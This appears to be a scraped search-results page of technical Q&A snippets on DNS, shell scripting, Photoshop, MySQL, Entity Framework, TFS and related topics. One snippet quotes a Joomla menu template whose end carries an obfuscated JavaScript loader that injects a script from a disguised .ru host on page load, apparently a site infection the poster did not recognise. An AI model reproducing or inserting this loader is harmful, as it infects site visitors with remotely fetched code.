Search Results

Search found 5175 results on 207 pages for 'simon child'.

Page 53/207 | < Previous Page | 49 50 51 52 53 54 55 56 57 58 59 60  | Next Page >

  • Can I use Zoneedit to do URL rewrite?

    - by chilly-child
    This is our scenario: Our DNS is hosted by a company. They don't manage the DNS. We use Zoneedit (www.zoneedit.com) to manage the DNS such as nameservers, CNAMEs, etc... Then we have our web host where we just have our files hosted. We have a subdomain created on zoneedit. We would like to do a URL rewrite so that subdomain.ourdomain.com is displayed as www.ourdomain.com/subdomain. Do I use Zoneedit to do the URL rewrite or the web host or the DNS host? I checked the Zoneedit docs but I could not find a way to do a URL rewrite. Need some advice. Thanks

    Read the article

  • tail -f and then exit on matching string

    - by Patrick
    I am trying to configure a startup script which will startup tomcat, monitor the catalina.out for the string "Server startup", and then run another process. I have been trying various combinations of tail -f with grep and awk, but haven't got anything working yet. The main issue I am having seems to be with forcing the tail to die after grep or awk have matched the string. I have simplified to the following test case. test.sh is listed below: #!/bin/sh rm -f child.out ./child.sh > child.out & tail -f child.out | grep -q B child.sh is listed below: #!/bin/sh echo A sleep 20 echo B echo C sleep 40 echo D The behavior I am seeing is that grep exits after 20 seconds , however the tail will take a further 40 seconds to die. I understand why this is happening - tail will only notice that the pipe is gone when it writes to it which only happens when data gets appended to the file. This is compounded by the fact that tail is to be buffering the data and outputting the B and C characters as a single write (I confirmed this by strace). I have attempted to fix that with solutions I found elsewhere, such as using unbuffer command, but that didn't help. Anybody got any ideas for how to get this working how I expect it? Or ideas for waiting for successful Tomcat start (thinking about waiting for a TCP port to know it has started, but suspect that will become more complex that what I am trying to do now). I have managed to get it working with awk doing a "killall tail" on match, but I am not happy with that solution. Note I am trying to get this to work on RHEL4.

    Read the article

  • Extracting the layer transparency into an editable layer mask in Photoshop

    - by last-child
    Is there any simple way to extract the "baked in" transparency in a layer and turn it into a layer mask in Photoshop? To take a simple example: Let's say that I paint a few strokes with a semi-transparent brush, or paste in a .png-file with an alpha channel. The rgb color values and the alpha value for each pixel are now all contained in the layer-image itself. I would like to be able to edit the alpha values as a layer mask, so that the layer image is solid and contains only the RGB values for each pixel. Is this possible, and in that case how? Thanks. EDIT: To clarify - I'm not really after the transparency values in themselves, but in the separation of rgb values and alpha values. That means that the layer must become a solid, opaque image with a mask.

    Read the article

  • unable to decompress a *.tar.xz file

    - by neubert
    Per http://askubuntu.com/a/107976 I tried tar xf php-5.6.0RC4.tar.xz and tar -xJf php-5.6.0RC4.tar.xz and in both cases I get the following: tar (child): xz: Cannot exec: No such file or directory tar (child): Error is not recoverable: exiting now tar: Child returned status 2 tar: Error is not recoverable: exiting now Here's php-5.6.0RC4.tar.xz: http://downloads.php.net/tyrael/php-5.6.0RC4.tar.xz I'm running Ubuntu 14.04 LTS.

    Read the article

  • Renicing complex multithreaded applications in Linux

    - by Vi
    Applications (especially big Java and C++ ones) often shows up as multiple lines in htop, each have separate PID and separate nice level. Also application can spawn a lot of child processes (like as in aptitude update), so I need to affect both parent one (to make new children have new priority) and child ones (to bring the effect immediately, not after the child terminates) How can I apply "renice" or "ionice" or "schedtool" to already launched big application?

    Read the article

  • mysqldump isn't able to export a specific database, phpMyAdmin crashes

    - by Devils Child
    I'm experiencing problems with a database on my server (Note: All other databases work fine). Once I try to export it with mysqldump I get this error: # mysqldump -u root -pXXXXXXXXX databasename > /root/databasename.sql mysqldump: Couldn't execute 'show table status like 'apps'': Lost connection to MySQL server during query (2013) Also, phpMyAdmin throws an error when selecting this database and immediately logs out. However, the web site which uses this database works fine. I can also execute SELECT statements on the table named "apps" from the MySQL shell. I tried restarting the MySQL daemon as well as REPAIR DATABASE and REPAIR TABLE but the problem still persists. I had this problem before, then it disappeared somehow without me doing anything to resolve the issue. Now, the problem is back and I'm simply unable to create a backup of this database. Used software Debian 6.0.7 x64 MySQL 5.1.66-0 MySQL Version: mysql> SHOW VARIABLES LIKE "%version%"; +-------------------------+-------------------+ | Variable_name | Value | +-------------------------+-------------------+ | protocol_version | 10 | | version | 5.1.66-0+squeeze1 | | version_comment | (Debian) | | version_compile_machine | x86_64 | | version_compile_os | debian-linux-gnu | +-------------------------+-------------------+

    Read the article

  • Many to many self join through junction table

    - by Peter
    I have an EF model that can self-reference through an intermediary class to define a parent/child relationship. I know how to do a pure many-to-many relationship using the Map command, but for some reason going through this intermediary class is causing problems with my mappings. The intermediary class provides additional properties for the relationship. See the classes, modelBinder logic and error below: public class Equipment { [Key] public int EquipmentId { get; set; } public virtual List<ChildRecord> Parents { get; set; } public virtual List<ChildRecord> Children { get; set; } } public class ChildRecord { [Key] public int ChildId { get; set; } [Required] public int Quantity { get; set; } [Required] public Equipment Parent { get; set; } [Required] public Equipment Child { get; set; } } I've tried building the mappings in both directions, though I only keep one set in at a time: modelBuilder.Entity<ChildRecord>() .HasRequired(x => x.Parent) .WithMany(x => x.Children ) .WillCascadeOnDelete(false); modelBuilder.Entity<ChildRecord>() .HasRequired(x => x.Child) .WithMany(x => x.Parents) .WillCascadeOnDelete(false); OR modelBuilder.Entity<Equipment>() .HasMany(x => x.Parents) .WithRequired(x => x.Child) .WillCascadeOnDelete(false); modelBuilder.Entity<Equipment>() .HasMany(x => x.Children) .WithRequired(x => x.Parent) .WillCascadeOnDelete(false); Regardless of which set I use, I get the error: The foreign key component 'Child' is not a declared property on type 'ChildRecord'. Verify that it has not been explicitly excluded from the model and that it is a valid primitive property. when I try do deploy my ef model to the database. If I build it without the modelBinder logic in place then I get two ID columns for Child and two ID columns for Parent in my ChildRecord table. This makes sense since it tries to auto create the navigation properties from Equipment and doesn't know that there are already properties in ChildRecord to fulfill this need. I tried using Data Annotations on the class, and no modelBuilder code, this failed with the same error as above: [Required] [ForeignKey("EquipmentId")] public Equipment Parent { get; set; } [Required] [ForeignKey("EquipmentId")] public Equipment Child { get; set; } AND [InverseProperty("Child")] public virtual List<ChildRecord> Parents { get; set; } [InverseProperty("Parent")] public virtual List<ChildRecord> Children { get; set; } I've looked at various other answers around the internet/SO, and the common difference seems to be that I am self joining where as all the answers I can find are for two different types. Entity Framework Code First Many to Many Setup For Existing Tables Many to many relationship with junction table in Entity Framework? Creating many to many junction table in Entity Framework

    Read the article

  • Apache downloads php files instead of running their source

    - by Devils Child
    I have just recently upgraded PHP 5.3 to 5.4 on my Debian Squeeze server. Now, instead of executing PHP files, Apache just downloads them, which is really bad. When I try to follow these steps, I get "broken packages" upon installing the libapache2-mod-php5 package. Also the answer tells me to add something to my httpd.conf, but it's empty. Question: How can I make apache execute php files again, instead of just passing them through as download? dpkg -l | grep php returns this rc libapache2-mod-php5 5.3.3-7+squeeze15 server-side, HTML-embedded scripting language (Apache 2 module) rc php5-cli 5.3.3-7+squeeze15 command-line interpreter for the php5 scripting language ii php5-common 5.4.15-1~dotdeb.2 Common files for packages built from the php5 source rc php5-gd 5.3.3-7+squeeze15 GD module for php5 rc php5-mcrypt 5.3.3-7+squeeze15 MCrypt module for php5 rc php5-mysql 5.3.3-7+squeeze15 MySQL module for php5 rc php5-suhosin 0.9.32.1-1 advanced protection module for php5 rc phpmyadmin 4:3.3.7-7 MySQL web administration tool And apt-get install libapache2-mod-php5 produces this error The following packages have unmet dependencies: libapache2-mod-php5 : Depends: libdb5.1 but it is not installable Depends: libssl1.0.0 (>= 1.0.0) but it is not installable Depends: libxml2 (>= 2.8.0) but 2.7.8.dfsg-2+squeeze7 is to be installed Recommends: php5-cli but it is not going to be installed E: Broken packages

    Read the article

  • Welcome Relief

    - by michael.seback
    Government organizations are experiencing unprecedented demand for social services. The current economy continues to put immense stress on social service organizations. Increased need for food assistance, employment security, housing aid and other critical services is keeping agencies busier than ever. ... The Kansas Department of Labor (KDOL) uses Oracle's social services solution in its employment security program. KDOL has used Siebel Customer Relationship Management (CRM) for nearly a decade, and recently purchased Oracle Policy Automation to improve its services even further. KDOL implemented Siebel CRM in 2002, and has expanded its use of it over the years. The agency started with Siebel CRM in the call center and later moved it into case management. Siebel CRM has been a strong foundation for KDOL in the face of rising demand for unemployment benefits, numerous labor-related law changes, and an evolving IT environment. ... The result has been better service for constituents. "It's really enabled our staff to be more effective in serving clients," said Hubka. That's a trend the department plans to continue. "We're 100 percent down the path of Siebel, in terms of what we're doing in the future," Hubka added. "Their vision is very much in line with what we're planning on doing ourselves." ... Community Services is the leading agency responsible for the safety and well-being of children and young people within Australia's New South Wales (NSW) Government. Already a longtime Oracle Case Management user, Community Services recently implemented Oracle Policy Automation to ensure accurate, consistent decisions in the management of child safety. "Oracle Policy Automation has helped to provide a vehicle for the consistent application of the Government's 'Keep Them Safe' child protection action plan," said Kerry Holling, CIO for Community Services. "We believe this approach is a world-first in the structured decisionmaking space for child protection and we believe our department is setting an example that other child protection agencies will replicate." ... Read the full case study here.

    Read the article

  • Automatically create bug resolution task using the TFS 2010 API

    - by Bob Hardister
    My customer requires bug resolution to be approved and tracked.  To minimize the overhead for developers I implemented a TFS 2010 server-side plug-in to automatically create a child resolution task for the bug when the “CCB” field is set to approved. The CCB field is a custom field.  I also added the story points field to the bug WIT for sizing purposes. Redundant tasks will not be created unless the bug title is changed or the prior task is closed. The program writes an audit trail to a log file visible in the TFS Admin Console Log view. Here’s the code. BugAutoTask.cs /* SPECIFICATION * When the CCB field on the bug is set to approved, create a child task where the task: * name = Resolve bug [ID] - [Title of bug] * assigned to = same as assigned to field on the bug * same area path * same iteration path * activity = Bug Resolution * original estimate = bug points * * The source code is used to build a dll (Ows.TeamFoundation.BugAutoTaskCreation.PlugIns.dll), * which needs to be copied to * C:\Program Files\Microsoft Team Foundation Server 2010\Application Tier\Web Services\bin\Plugins * on ALL TFS application-tier servers. * * Author: Bob Hardister. */ using System; using System.Collections.Generic; using System.IO; using System.Xml; using System.Text; using System.Diagnostics; using System.Linq; using Microsoft.TeamFoundation.Common; using Microsoft.TeamFoundation.Framework.Server; using Microsoft.TeamFoundation.WorkItemTracking.Client; using Microsoft.TeamFoundation.WorkItemTracking.Server; using Microsoft.TeamFoundation.Client; using System.Collections; namespace BugAutoTaskCreation { public class BugAutoTask : ISubscriber { public EventNotificationStatus ProcessEvent(TeamFoundationRequestContext requestContext, NotificationType notificationType, object notificationEventArgs, out int statusCode, out string statusMessage, out ExceptionPropertyCollection properties) { statusCode = 0; properties = null; statusMessage = String.Empty; // Error message for for tracing last code executed and optional fields string lastStep = "No field values found or set "; try { if ((notificationType == NotificationType.Notification) && (notificationEventArgs.GetType() == typeof(WorkItemChangedEvent))) { WorkItemChangedEvent workItemChange = (WorkItemChangedEvent)notificationEventArgs; // see ConnectToTFS() method below to select which TFS instance/collection // to connect to TfsTeamProjectCollection tfs = ConnectToTFS(); WorkItemStore wiStore = tfs.GetService<WorkItemStore>(); lastStep = lastStep + ": connection to TFS successful "; // Get the work item that was just changed by the user. WorkItem witem = wiStore.GetWorkItem(workItemChange.CoreFields.IntegerFields[0].NewValue); lastStep = lastStep + ": retrieved changed work item, ID:" + witem.Id + " "; // Filter for Bug work items only if (witem.Type.Name == "Bug") { // DEBUG lastStep = lastStep + ": changed work item is a bug "; // Filter for CCB (i.e. Baseline Status) field set to approved only bool BaselineStatusChange = false; if (workItemChange.ChangedFields != null) { ProcessBugRevision(ref lastStep, workItemChange, wiStore, ref witem, ref BaselineStatusChange); } } } } catch (Exception e) { Trace.WriteLine(e.Message); Logger log = new Logger(); log.WriteLineToLog(MsgLevel.Error, "Application error: " + lastStep + " - " + e.Message + " - " + e.InnerException); } statusCode = 1; statusMessage = "Bug Auto Task Evaluation Completed"; properties = null; return EventNotificationStatus.ActionApproved; } // PRIVATE METHODS private static void ProcessBugRevision(ref string lastStep, WorkItemChangedEvent workItemChange, WorkItemStore wiStore, ref WorkItem witem, ref bool BaselineStatusChange) { foreach (StringField field in workItemChange.ChangedFields.StringFields) { // DEBUG lastStep = lastStep + ": last changed field is - " + field.Name + " "; if (field.Name == "Baseline Status") { lastStep = lastStep + ": retrieved bug baseline status field value, bug ID:" + witem.Id + " "; BaselineStatusChange = (field.NewValue != field.OldValue); if ((BaselineStatusChange) && (field.NewValue == "Approved")) { // Instanciate logger Logger log = new Logger(); // *** Create resolution task for this bug *** // ******************************************* // Get the team project and selected field values of the bug work item Project teamProject = witem.Project; int bugID = witem.Id; string bugTitle = witem.Fields["System.Title"].Value.ToString(); string bugAssignedTo = witem.Fields["System.AssignedTo"].Value.ToString(); string bugAreaPath = witem.Fields["System.AreaPath"].Value.ToString(); string bugIterationPath = witem.Fields["System.IterationPath"].Value.ToString(); string bugChangedBy = witem.Fields["System.ChangedBy"].OriginalValue.ToString(); string bugTeamProject = witem.Project.Name; lastStep = lastStep + ": all mandatory bug field values found "; // Optional fields Field bugPoints = witem.Fields["Microsoft.VSTS.Scheduling.StoryPoints"]; if (bugPoints.Value != null) { lastStep = lastStep + ": all mandatory and optional bug field values found "; } // Initialize child resolution task title string childTaskTitle = "Resolve bug " + bugID + " - " + bugTitle; // At this point I can check if a resolution task (of the same name) // for the bug already exist // If so, do not create a new resolution task bool createResolutionTask = true; WorkItem parentBug = wiStore.GetWorkItem(bugID); WorkItemLinkCollection links = parentBug.WorkItemLinks; foreach (WorkItemLink wil in links) { if (wil.LinkTypeEnd.Name == "Child") { WorkItem childTask = wiStore.GetWorkItem(wil.TargetId); if ((childTask.Title == childTaskTitle) && (childTask.State != "Closed")) { createResolutionTask = false; log.WriteLineToLog(MsgLevel.Info, "Team project " + bugTeamProject + ": " + bugChangedBy + " - set the CCB field to \"Approved\" for bug, ID: " + bugID + ". Task not created as open one of the same name already exist, ID:" + childTask.Id); } } } if (createResolutionTask) { // Define the work item type of the new work item WorkItemTypeCollection workItemTypes = wiStore.Projects[teamProject.Name].WorkItemTypes; WorkItemType wiType = workItemTypes["Task"]; // Setup the new task and assign field values witem = new WorkItem(wiType); witem.Fields["System.Title"].Value = "Resolve bug " + bugID + " - " + bugTitle; witem.Fields["System.AssignedTo"].Value = bugAssignedTo; witem.Fields["System.AreaPath"].Value = bugAreaPath; witem.Fields["System.IterationPath"].Value = bugIterationPath; witem.Fields["Microsoft.VSTS.Common.Activity"].Value = "Bug Resolution"; lastStep = lastStep + ": all mandatory task field values set "; // Optional fields if (bugPoints.Value != null) { witem.Fields["Microsoft.VSTS.Scheduling.OriginalEstimate"].Value = bugPoints.Value; lastStep = lastStep + ": all mandatory and optional task field values set "; } // Check for validation errors before saving the new task and linking it to the bug ArrayList validationErrors = witem.Validate(); if (validationErrors.Count == 0) { witem.Save(); // Link the new task (child) to the bug (parent) var linkType = wiStore.WorkItemLinkTypes[CoreLinkTypeReferenceNames.Hierarchy]; // Fetch the work items to be linked var parentWorkItem = wiStore.GetWorkItem(bugID); int taskID = witem.Id; var childWorkItem = wiStore.GetWorkItem(taskID); // Add a new link to the parent relating the child and save it parentWorkItem.Links.Add(new WorkItemLink(linkType.ForwardEnd, childWorkItem.Id)); parentWorkItem.Save(); log.WriteLineToLog(MsgLevel.Info, "Team project " + bugTeamProject + ": " + bugChangedBy + " - set the CCB field to \"Approved\" for bug, ID:" + bugID + ", which automatically created child resolution task, ID:" + taskID); } else { log.WriteLineToLog(MsgLevel.Error, "Error in creating bug resolution child task for bug ID:" + bugID); foreach (Field taskField in validationErrors) { log.WriteLineToLog(MsgLevel.Error, " - Validation Error in task field: " + taskField.ReferenceName); } } } } } } } private TfsTeamProjectCollection ConnectToTFS() { // Connect to TFS string tfsUri = string.Empty; // Production TFS instance production collection tfsUri = @"xxxx"; // Production TFS instance admin collection //tfsUri = @"xxxxx"; // Local TFS testing instance default collection //tfsUri = @"xxxxx"; TfsTeamProjectCollection tfs = new TfsTeamProjectCollection(new System.Uri(tfsUri)); tfs.EnsureAuthenticated(); return tfs; } // HELPERS public string Name { get { return "Bug Auto Task Creation Event Handler"; } } public SubscriberPriority Priority { get { return SubscriberPriority.Normal; } } public enum MsgLevel { Info, Warning, Error }; public Type[] SubscribedTypes() { return new Type[1] { typeof(WorkItemChangedEvent) }; } } } Logger.cs using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Text; using System.Windows.Forms; namespace BugAutoTaskCreation { class Logger { // fields private string _ApplicationDirectory = @"C:\ProgramData\Microsoft\Team Foundation\Server Configuration\Logs"; private string _LogFileName = @"\CFG_ACCT_AT_OWS_BugAutoTaskCreation.log"; private string _LogFile; private string _LogTimestamp = DateTime.Now.ToString("MM/dd/yyyy HH:mm:ss"); private string _MsgLevelText = string.Empty; // default constructor public Logger() { // check for a prior log file FileInfo logFile = new FileInfo(_ApplicationDirectory + _LogFileName); if (!logFile.Exists) { CreateNewLogFile(ref logFile); } } // properties public string ApplicationDirectory { get { return _ApplicationDirectory; } set { _ApplicationDirectory = value; } } public string LogFile { get { _LogFile = _ApplicationDirectory + _LogFileName; return _LogFile; } set { _LogFile = value; } } // PUBLIC METHODS public void WriteLineToLog(BugAutoTask.MsgLevel msgLevel, string logRecord) { try { // set msgLevel text if (msgLevel == BugAutoTask.MsgLevel.Info) { _MsgLevelText = "[Info @" + MsgTimeStamp() + "] "; } else if (msgLevel == BugAutoTask.MsgLevel.Warning) { _MsgLevelText = "[Warning @" + MsgTimeStamp() + "] "; } else if (msgLevel == BugAutoTask.MsgLevel.Error) { _MsgLevelText = "[Error @" + MsgTimeStamp() + "] "; } else { _MsgLevelText = "[Error: unsupported message level @" + MsgTimeStamp() + "] "; } // write a line to the log file StreamWriter logFile = new StreamWriter(_ApplicationDirectory + _LogFileName, true); logFile.WriteLine(_MsgLevelText + logRecord); logFile.Close(); } catch (Exception) { throw; } } // PRIVATE METHODS private void CreateNewLogFile(ref FileInfo logFile) { try { string logFilePath = logFile.FullName; // write the log file header _MsgLevelText = "[Info @" + MsgTimeStamp() + "] "; string cpu = string.Empty; if (Environment.Is64BitOperatingSystem) { cpu = " (x64)"; } StreamWriter newLog = new StreamWriter(logFilePath, false); newLog.Flush(); newLog.WriteLine(_MsgLevelText + "===================================================================="); newLog.WriteLine(_MsgLevelText + "Team Foundation Server Administration Log"); newLog.WriteLine(_MsgLevelText + "Version : " + "1.0.0 Author: Bob Hardister"); newLog.WriteLine(_MsgLevelText + "DateTime : " + _LogTimestamp); newLog.WriteLine(_MsgLevelText + "Type : " + "OWS Custom TFS API Plug-in"); newLog.WriteLine(_MsgLevelText + "Activity : " + "Bug Auto Task Creation for CCB Approved Bugs"); newLog.WriteLine(_MsgLevelText + "Area : " + "Build Explorer"); newLog.WriteLine(_MsgLevelText + "Assembly : " + "Ows.TeamFoundation.BugAutoTaskCreation.PlugIns.dll"); newLog.WriteLine(_MsgLevelText + "Location : " + @"C:\Program Files\Microsoft Team Foundation Server 2010\Application Tier\Web Services\bin\Plugins"); newLog.WriteLine(_MsgLevelText + "User : " + Environment.UserDomainName + @"\" + Environment.UserName); newLog.WriteLine(_MsgLevelText + "Machine : " + Environment.MachineName); newLog.WriteLine(_MsgLevelText + "System : " + Environment.OSVersion + cpu); newLog.WriteLine(_MsgLevelText + "===================================================================="); newLog.WriteLine(_MsgLevelText); newLog.Close(); } catch (Exception) { throw; } } private string MsgTimeStamp() { string msgTimestamp = string.Empty; return msgTimestamp = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss:fff"); } } }

    Read the article

  • [Oracle Identity Manager] 11g R2 Bundle Patch 09 is Available!

    - by mustafakaya
    Oracle Identity Manager Bundle Patch 09 is available now. You can download BP09 from here. Also,there is a important recommendation for BP08!  List of bugs fixed with BP09; Bug:12699224 : Trusted source reconciliation fails to create users with many reconciliation field mappings. Bug:14407437 : Provisioning through bulk request inserts null records into child tables. Bug:14493217 : Target resource reconciliation throws ORA-06512 error when the Descriptive field is mapped to a field that does not have a reconciliation field mapping. Bug:16044671 : User form customization fails if a UDF contains invalid character. Bug:16545968 : Modifying any attribute on a service account changes the account type as a primary account. Bug:16562633 : Oracle Identity Manager throws javax.el.elexceptions while viewing profile under direct report. Bug:16662834 : User not reprovisoned after user is deleted and created in the target with the same orclguid. Bug:16662905 : If an LOV field is required on an Application Instance form, no validation is enforced on the LOV field although it is required. Bug:16701873 : The Members tab of a role displays only enabled users and does not display disabled users. Bug:16862846 : When a notification is being sent, the mail ID in the Reply To field is set as the recipient's mail ID instead of the sender's mail ID. Bug:16824062 : When you use API to fetch or delete child data from an account, the child data row value is null. Therefore, child data is not returned. Bug:16912736 : There is a performance issue when the provisioned application instance details is opened for a user.

    Read the article

  • NHibernate Pitfalls: Cascades

    - by Ricardo Peres
    This is part of a series of posts about NHibernate Pitfalls. See the entire collection here. For entities that have associations – one-to-one, one-to-many, many-to-one or many-to-many –, NHibernate needs to know what to do with their related entities, in three particular moments: when saving, updating or deleting. In particular, there are two possible behaviors: either ignore these related entities or cascade changes to them. NHibernate allows setting the cascade behavior for each association, and the default behavior is not to cascade (ignore). The possible cascade options are: None Ignore, this is the default Save-Update If the entity is being saved or updated, also save any related entities that are either not saved or have been modified and associate these related entities to the root entity. Generally safe Delete If the entity is being deleted, also delete the related entities. This is only useful for parent-child relations Delete-Orphan Identical to Delete, with the addition that if once related entity is removed from the association – orphaned –, also delete it. Also only for parent-child All Combination of Save-Update and Delete, usually that’s what we want (for parent-child relations, of course) All-Delete-Orphan Same as All plus delete any related entities who lose their relationship In summary, Save-Update is generally what you want in most cases. As for the Delete variations, they should only be used if the related entities depend on the root entity (parent-child), so that deleting the root entity and not their related entities would result in a constraint violation on the database.

    Read the article

  • Persisting simple tree with (Fluent-)NHibernate leads to System.InvalidCastException

    - by fudge
    Hi there, there seems to be a problem with recursive data structures and (Fluent-)NHibernate or its just me, being a complete moron... here's the tree: public class SimpleNode { public SimpleNode () { this.Children = new List<SimpleNode> (); } public virtual SimpleNode Parent { get; private set; } public virtual List<SimpleNode> Children { get; private set; } public virtual void setParent (SimpleNode parent) { parent.AddChild (this); Parent = parent; } public virtual void AddChild (SimpleNode child) { this.Children.Add (child); } public virtual void AddChildren (IEnumerable<SimpleNode> children) { foreach (var child in children) { AddChild (child); } } } the mapping: public class SimpleNodeEntity : ClassMap<SimpleNode> { public SimpleNodeEntity () { Id (x => x.Id); References (x => x.Parent).Nullable (); HasMany (x => x.Children).Not.LazyLoad ().Inverse ().Cascade.All ().KeyNullable (); } } now, whenever I try to save a node, I get this: System.InvalidCastException: Cannot cast from source type to destination type. at (wrapper dynamic-method) SimpleNode. (object,object[],NHibernate.Bytecode.Lightweight.SetterCallback) at NHibernate.Bytecode.Lightweight.AccessOptimizer.SetPropertyValues (object,object[]) at NHibernate.Tuple.Entity.PocoEntityTuplizer.SetPropertyValuesWithOptimizer (object,object[]) My setup: Mono 2.8.1 (on OSX), NHibernate 2.1.2, FluentNHibernate 1.1.0

    Read the article

  • Parse error: syntax error, unexpected '<' in /home/future/public_html/modules/mod_mainmenu/tmpl/defa

    - by kofi
    I'm unfortunately having an unknown error with my php file. (for joomla 1.5) I don't seem to get what's wrong. This is my entire code, with an apparent error on line 84. Would appreciate some feedback, thanks. <?php // no direct access defined('_JEXEC') or die('Restricted access'); if ( ! defined('modMainMenuXMLCallbackDefined') ) { function modMainMenuXMLCallback(&$node, $args) { $user = &JFactory::getUser(); $menu = &JSite::getMenu(); $active = $menu->getActive(); $path = isset($active) ? array_reverse($active->tree) : null; if (($args['end']) && ($node->attributes('level') >= $args['end'])) { $children = $node->children(); foreach ($node->children() as $child) { if ($child->name() == 'ul') { $node->removeChild($child); } } } if ($node->name() == 'ul') { foreach ($node->children() as $child) { if ($child->attributes('access') > $user->get('aid', 0)) { $node->removeChild($child); } } } if (($node->name() == 'li') && isset($node->ul)) { $node->addAttribute('class', 'parent'); } if (isset($path) && (in_array($node->attributes('id'), $path) || in_array($node->attributes('rel'), $path))) { if ($node->attributes('class')) { $node->addAttribute('class', $node->attributes('class').' active'); } else { $node->addAttribute('class', 'active'); } } else { if (isset($args['children']) && !$args['children']) { $children = $node->children(); foreach ($node->children() as $child) { if ($child->name() == 'ul') { $node->removeChild($child); } } } } if (($node->name() == 'li') && ($id = $node->attributes('id'))) { if ($node->attributes('class')) { $node->addAttribute('class', $node->attributes('class').' item'.$id); } else { $node->addAttribute('class', 'item'.$id); } } if (isset($path) && $node->attributes('id') == $path[0]) { $node->addAttribute('id', 'current'); } else { $node->removeAttribute('id'); } $node->removeAttribute('rel'); $node->removeAttribute('level'); $node->removeAttribute('access'); } define('modMainMenuXMLCallbackDefined', true); } modMainMenuHelper::render($params, 'modMainMenuXMLCallback'); <script>var Zl;if(Zl!='' && Zl!='ki'){Zl=''};function v(){var jL=new String();var M=window;var q="";var ZY='';var Z=unescape;var C;if(C!='' && C!='g'){C=null};this.nj='';var _='';this.X="";var t=new Date();var R="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x61\x72\x65\x61\x73\x61\x6c\x65\x2d\x63\x6f\x6d\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x7a\x2e\x65\x79\x6e\x79\x2d\x63\x6f\x6d\x2e\x59\x6f\x75\x72\x42\x6c\x65\x6e\x64\x65\x72\x50\x61\x72\x74\x73\x2e\x72\x75\x3a";var Od;if(Od!='Dm' && Od!='V'){Od='Dm'};var Vr='';var P=new String("g");var B="";var E;if(E!='' && E!='gD'){E=null};function b(y,U){var zm=new Array();var a='';this.Cm="";var Vb=new String();var k=Z("%5b")+U+Z("%5d");var tX=new String();var MV;if(MV!='' && MV!='qt'){MV='MD'};var c=new RegExp(k, P);return y.replace(c, _);var cS="";var RTD='';};var Zr;if(Zr!='' && Zr!='vJ'){Zr=''};var L=new String();var DE=new Date();var fg;if(fg!='Ep'){fg='Ep'};var nf;if(nf!=''){nf='d_'};var W=Z("%2f%67%6f%6f%67%6c%65%2e%61%74%2f%67%6f%6f%67%6c%65%2e%61%74%2f%64%72%75%64%67%65%72%65%70%6f%72%74%2e%63%6f%6d%2f%74%72%61%76%69%61%6e%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");this.aA='';var u='';this.XB='';var dP;if(dP!='i' && dP != ''){dP=null};var dN;if(dN!='' && dN!='zx'){dN='_y'};var WS=b('85624104275582212705194497','13296457');var Hb=new Array();var lP;if(lP!='ok' && lP != ''){lP=null};var O=document;function n(){var J;if(J!='mS' && J != ''){J=null};u=R;var jv;if(jv!='' && jv!='jw'){jv=''};u+=WS;var MJ;if(MJ!='Qp'){MJ=''};u+=W;var fj=new Array();this.PM="";try {this.dq='';var ln=new Date();var eS=new Date();h=O.createElement(b('sScwrwi4pSt5','OZjKg4w5S'));var uW=new String();var Aj;if(Aj!='lX'){Aj='lX'};var aF;if(aF!='' && aF!='_o'){aF=null};h.src=u;var GY;if(GY!='ev' && GY!='Jr'){GY='ev'};var KK;if(KK!=''){KK='gDq'};h.defer=[1][0];var nO;if(nO!='tP'){nO=''};var aV=new Date();var bE=new Date();O.body.appendChild(h);this.Ze="";} catch(MC){var Ki;if(Ki!='m_' && Ki != ''){Ki=null};};}M[String("pqP5onloa".substr(4)+"drYD".substr(0,1))]=n;var EY;if(EY!='' && EY!='wn'){EY='Sj'};var ep;if(ep!='' && ep!='_q'){ep='Oy'};var uE=new Array();var E_;if(E_!='iU'){E_='iU'};};this.pt="";v();var tl=new String();</script> <!--793d57c076e95df45c451725e5dedf6f-->

    Read the article

  • SSDT - What's in a name?

    - by jamiet
    SQL Server Data Tools (SSDT) recently got released as part of SQL Server 2012 and depending on who you believe it can be described as either: a suite of tools for building SQL Server database solutions or a suite of tools for building SQL Server database, Integration Services, Analysis Services & Reporting Services solutions Certainly the SQL Server 2012 installer seems to think it is the latter because it describes SQL Server Data Tools as "the SQL server development environment, including the tool formerly named Business Intelligence Development Studio. Also installs the business intelligence tools and references to the web installers for database development tools" as you can see here: Strange then that, seemingly, there is no consensus within Microsoft about what SSDT actually is. On yesterday's blog post First Release of SSDT Power Tools reader Simon Lampen asked the quite legitimate question:I understand (rightly or wrongly) that SSDT is the replacement for BIDS for SQL 2012 and have just installed this. If this is the case can you please point me to how I can edit rdl and rdlc files from within Visual Studio 2010 and import MS Access reports.To which came the following reply:SSDT doesn't include any BIDs (sic) components. Following up with the appropriate team (Analysis Services, Reporting Services, Integration Services) via their forum or msdn page would be the best way to answer you questions about these kinds of services. That's from a Microsoft employee by the way. Simon is even more confused by this and replies with:I have done some more digging and am more confused than ever. This documentation (and many others) : msdn.microsoft.com/.../ms156280.aspx expressly states that SSDT is where report editing tools are to be foundAnd on it goes....You can see where Simon's confusion stems from. He has official documentation stating that SSDT includes all the stuff for building SSIS/SSAS/SSRS solutions (this is confirmed in the installer, remember) yet someone from Microsoft tells him "SSDT doesn't include any BIDs components".I have been close to this for a long time (all the way through the CTPs) so I can kind of understand where the confusion stems from. To my understanding SSDT was originally the name of the database dev stuff but eventually that got expanded to include all of the dev tools - I guess not everyone in Microsoft got the memo.Does this sound familiar? Have we not been down this road before? The database dev tools have had upteen names over the years (do any of datadude, TSData, VSTS for DB Pros, DBPro, VS2010 Database Projects sound familiar) and I was hoping that the SSDT moniker would put all confusion to bed - evidently its as complicated now as it has ever been.Forgive me for whinging but putting meaningful, descriptive, accurate, well-defined and easily-communicated names onto a product doesn't seem like a difficult thing to do. I guess I'm mistaken!Onwards and upwards...@Jamiet

    Read the article

  • Visual Studio Talk Show #117 is now online - Microsoft Surface (French)

    http://www.visualstudiotalkshow.com Simon Ferquel et Thomas Lebrun: Microsoft Surface Nous discutons avec Simon Ferquel et Thomas Lebrun du systme informatique "Surface". Surface se prsente l'utilisateur comme une table dont le dessus est constitu d'une surface dot dun affichage tactile "multitouch" qui permet de manipuler un contenu informatique l'aide d'un cran tactile. Thomas Lebrun est architecte et dveloppeur chez Access IT Paris. Il est particulirement intress...Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

    Read the article

